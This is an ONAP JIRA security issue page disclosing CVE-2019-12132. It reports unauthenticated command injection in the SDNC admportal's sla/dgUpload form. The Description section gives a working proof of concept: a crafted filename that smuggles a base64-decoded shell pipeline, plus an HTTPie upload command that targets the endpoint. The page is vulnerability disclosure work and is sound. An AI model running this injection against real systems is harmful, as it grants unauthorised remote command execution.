Uploaded image for project: 'ONAP JIRA Security Issues'
  1. ONAP JIRA Security Issues
  2. OJSI-40 SDNC service allows for arbitrary code execution
  3. OJSI-41

SDNC service allows for arbitrary code execution in sla/dgUpload form (CVE-2019-12132)

    XMLWordPrintable

Details

    • CVE-2019-12132
    • Hide

      Title: SDNC service allows for arbitrary code execution in sla/dgUpload form

      Reporter: Jakub Botwicz, Wojciech Rauner, Łukasz Wrochna and Radosław Żeszczuk from Samsung

      Products: SDNC

      Affects: Casablanca and earlier

      Description:

      Jakub Botwicz, Wojciech Rauner, Łukasz Wrochna and Radosław Żeszczuk from Samsung  reported a vulnerability in SDNC.. By executing sla/dgUpload with a crafted filename parameter an unauthenticated attacker can execute arbitrary command. All SDC setups which includes admportal are affected.

      Note:

      Dublin release is not vulnerable for this attack because the admportal has been disabled but the code itself is still vulnerable.

      Show
      Title: SDNC service allows for arbitrary code execution in sla/dgUpload form Reporter: Jakub Botwicz, Wojciech Rauner, Łukasz Wrochna and Radosław Żeszczuk from Samsung Products: SDNC Affects: Casablanca and earlier Description: Jakub Botwicz, Wojciech Rauner, Łukasz Wrochna and Radosław Żeszczuk from Samsung  reported a vulnerability in SDNC.. By executing sla/dgUpload with a crafted filename parameter an unauthenticated attacker can execute arbitrary command. All SDC setups which includes admportal are affected. Note: Dublin release is not vulnerable for this attack because the admportal has been disabled but the code itself is still vulnerable.
    • OJSI-SDNC
    • SDNC El Alto Sprint 1

    Description

      SDNC allows any user/logged for arbitrary code execution in form.
      Sample payload below.

      Path: sdnc-oam/admportal/server/router/routes/sla.js:149
      Url: http://<IP>:30201/sla/dgUpload
      Exploit: touch '|| echo L3RtcC9kZ1VwbG9hZA== | base64 -d | xargs touch #'
      Exploit: http -f 'http://<IP>:30201/sla/dgUpload' filename@||\ echo\ L3RtcC9kZ1VwbG9hZA\=\=\ |\ base64\ -d\ |\ xargs\ touch#

      (requires HTTPie toolkit)

       

      Attachments

        No reviews matched the request. Check your Options in the drop-down menu of this sections header.

        Activity

          People

            arotundo Alfred Rotundo
            Jakub.Botwicz Jakub Botwicz
            Dan Timoney Dan Timoney
            Votes:
            0 Vote for this issue
            Watchers:
            5 Start watching this issue

            Dates

              Created:
              Updated:
              Resolved: